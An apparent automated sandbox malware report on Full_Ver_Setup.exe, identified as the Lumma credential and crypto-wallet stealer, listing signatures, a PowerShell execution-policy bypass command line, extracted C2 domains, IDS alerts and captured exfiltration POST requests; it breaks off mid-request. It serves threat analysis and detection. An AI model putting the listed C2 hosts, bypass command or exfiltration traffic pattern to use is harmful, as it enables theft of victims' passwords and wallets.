Windows Analysis Report
Full_Ver_Setup.exe

Overview

General Information

Sample name: Full_Ver_Setup.exe
Analysis ID: 1579540
MD5: 5258ca149eea36d761a7e5649cb93855
SHA1: 6b6c7a347389758d8edfb8582a730871c6786c06
SHA256: d92ea1ef0c0f2c1b6fe016fc25473bb6ce625d9a2c5134c62806aeb07c5033af
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation Via Stdin
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Full_Ver_Setup.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\Full_Ver_Setup.exe" MD5: 5258CA149EEA36D761A7E5649CB93855)
    • powershell.exe (PID: 3064 cmdline: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> 
<p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f638f1188e30f7d</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- 
/#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["crosshuaht.lat", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat", "sustainskelet.lat", "energyaffai.lat", "fannleadyn.click", "rapeflowwj.lat", "discokeyus.lat"], "Build id": "hRjzG3--ZINA"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x4b173:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: Full_Ver_Setup.exe PID: 6476 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: Full_Ver_Setup.exe PID: 6476 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Full_Ver_Setup.exe PID: 6476 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

              System Summary

Source | Author | Data
Process started | Nikita Nazarov, oscd.community | Command: powershell -exec bypass <!DOCTYPE html> ... (the same Cloudflare "Suspected phishing site" HTML page passed verbatim as the powershell.exe command line in the process tree above; truncated in the report)
Process started | Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Command: powershell -exec bypass <!DOCTYPE html> ... (same command line as above; truncated in the report)
Process started | frack113 | Command: powershell -exec bypass <!DOCTYPE html> ... (same command line as above; truncated in the report)
Process started | Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Command: powershell -exec bypass <!DOCTYPE html> ... (same command line as above; truncated in the report)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-22T23:30:19.760409+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:21.715303+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:24.417773+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:26.738257+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:28.931974+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:31.637679+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:33.777838+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:36.554754+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:40.219207+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:45.969482+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 194.58.112.174 | 443 | TCP
2024-12-22T23:30:52.133737+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 104.21.84.113 | 443 | TCP
2024-12-22T23:30:20.486574+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:22.496928+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:41.011639+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:20.486574+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:22.496928+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.63.229 | 443 | TCP
2024-12-22T23:30:34.556675+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 104.21.63.229 | 443 | TCP


              AV Detection

Source: Full_Ver_Setup.exe.6476.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "necklacebudi.lat", "aspecteirs.lat", "grannyejh.lat", "sustainskelet.lat", "energyaffai.lat", "fannleadyn.click", "rapeflowwj.lat", "discokeyus.lat"], "Build id": "hRjzG3--ZINA"}
Source: Full_Ver_Setup.exe | Virustotal: Detection: 12%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.4% probability
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: rapeflowwj.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: crosshuaht.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: sustainskelet.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: aspecteirs.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: energyaffai.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: necklacebudi.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: discokeyus.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: grannyejh.lat
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: fannleadyn.click
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp | String decryptor: hRjzG3--ZINA
Source: Full_Ver_Setup.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [ebp+00h], al0_2_0321E346
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-466F3075h]0_2_03227227
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov esi, eax0_2_0322C19F
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0322C19F
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov edx, ecx0_2_0323D2F7
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov esi, edx0_2_032262FD
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx esi, byte ptr [eax]0_2_0322B2C6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [edx], al0_2_03227125
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then jmp dword ptr [004436A4h]0_2_03217136
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-4B2E9D9Fh]0_2_0322A13C
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h0_2_0323B116
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h0_2_0323B116
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov edx, ecx0_2_0323B116
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ecx, eax0_2_0323F146
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov esi, eax0_2_0322C1A4
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0322C1A4
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ecx, eax0_2_0320C046
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh0_2_0321A056
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ebx, eax0_2_032070F6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeCode function: 4x nop then mov ebp, eax0_2_032070F6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx edx, byte ptr [eax] | 0_2_0322872B
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+esi-14h] | 0_2_032377B6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_0322B629
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then add ecx, FFFFFFFEh | 0_2_03238636
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000ABh] | 0_2_03216660
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-7B590292h] | 0_2_032216A5
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then jmp ecx | 0_2_032286DA
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 0_2_0322A566
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then call dword ptr [00440DA8h] | 0_2_0320E43C
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], 12BAC918h | 0_2_032194C9
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+edi+0Ch] | 0_2_03209B26
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_03216B32
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then mov byte ptr [edi], cl | 0_2_0322DB64
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 2DA07A80h | 0_2_0323EB76
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx ebx, bx | 0_2_03225BB6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_03234A26
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+edi+5602E8D9h] | 0_2_0320DA04
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax] | 0_2_03223A66
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-0EAF77CFh] | 0_2_0322CADF
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then mov edx, ecx | 0_2_0323E936
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 71B3F069h | 0_2_0323E936
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx edx, byte ptr [esi+ecx+60h] | 0_2_0320C93C
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+24h] | 0_2_032299A9
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then mov ecx, eax | 0_2_0323A9B6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-29h] | 0_2_0320A9D6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 5D0AA591h | 0_2_0323CF30
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0Eh] | 0_2_03228F6C
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then cmp al, 2Eh | 0_2_03226F85
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then mov byte ptr [ecx], al | 0_2_0320DFF2
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx-4B2E9DB5h] | 0_2_03228EA6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh | 0_2_03215EC6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then mov ecx, edx | 0_2_0323EED6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h | 0_2_03218ED8
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then mov ecx, eax | 0_2_03226D06
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 0_2_0323EDC6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then mov ecx, eax | 0_2_0320ADC6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ebp+458F1EF1h] | 0_2_0320ADC6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+28h] | 0_2_03208C56
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 0_2_03208C56
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then mov ebx, edx | 0_2_03237CA6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], C7235EAFh | 0_2_0323ECA6
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx+042DD56Dh] | 0_2_0323CCE9

              Networking

              Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 104.21.63.229:443
              Source: Malware configuration extractor | URLs: crosshuaht.lat
              Source: Malware configuration extractor | URLs: necklacebudi.lat
              Source: Malware configuration extractor | URLs: aspecteirs.lat
              Source: Malware configuration extractor | URLs: grannyejh.lat
              Source: Malware configuration extractor | URLs: sustainskelet.lat
              Source: Malware configuration extractor | URLs: energyaffai.lat
              Source: Malware configuration extractor | URLs: fannleadyn.click
              Source: Malware configuration extractor | URLs: rapeflowwj.lat
              Source: Malware configuration extractor | URLs: discokeyus.lat
              Source: Joe Sandbox View | IP Address: 194.58.112.174
              Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
              Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 194.58.112.174:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.84.113:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.63.229:443
              Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.63.229:443
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: fannleadyn.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 78
                Host: fannleadyn.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=JOXNEUD6
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 18102
                Host: fannleadyn.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=YS0G6TE8A
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8729
                Host: fannleadyn.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=XKLNRRWZBA
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 20388
                Host: fannleadyn.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=ZA887B5551
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 7087
                Host: fannleadyn.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=OFJH7NIY
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 1218
                Host: fannleadyn.click
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
